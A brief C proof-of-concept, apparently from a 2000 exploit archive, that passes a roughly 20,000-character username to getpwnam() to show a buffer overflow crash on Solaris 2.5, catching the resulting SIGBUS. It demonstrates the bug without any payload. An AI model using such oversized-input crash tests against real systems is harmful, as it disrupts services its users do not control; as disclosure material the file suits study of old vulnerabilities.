/*
 
    Solaris 2.5
 
    Charles Howes found following.  This program dies on Solaris  2.5.
    This shows that getpwnam() has an overflowable buffer.
 
*/

#include <stdio.h>
#include <pwd.h>
#include <signal.h>

foobomb()
{
  printf("Uhoh... getpwnam() died.\n");
  exit();
}

main()
{
  char buf[20000];
  struct passwd *pw;
  memset(buf,'a',19990);
  signal(SIGBUS,foobomb);
  pw=getpwnam(buf);
  signal(SIGBUS,SIG_IGN);
  if (!pw)
    {
      printf("Success, no user was found.\n");
    }
  else
    {
      printf("What the... a user was found?\n");
      printf("  user: %.100s\n",pw->pw_name);
    }
}
/*                    www.hack.co.za              [2000]*/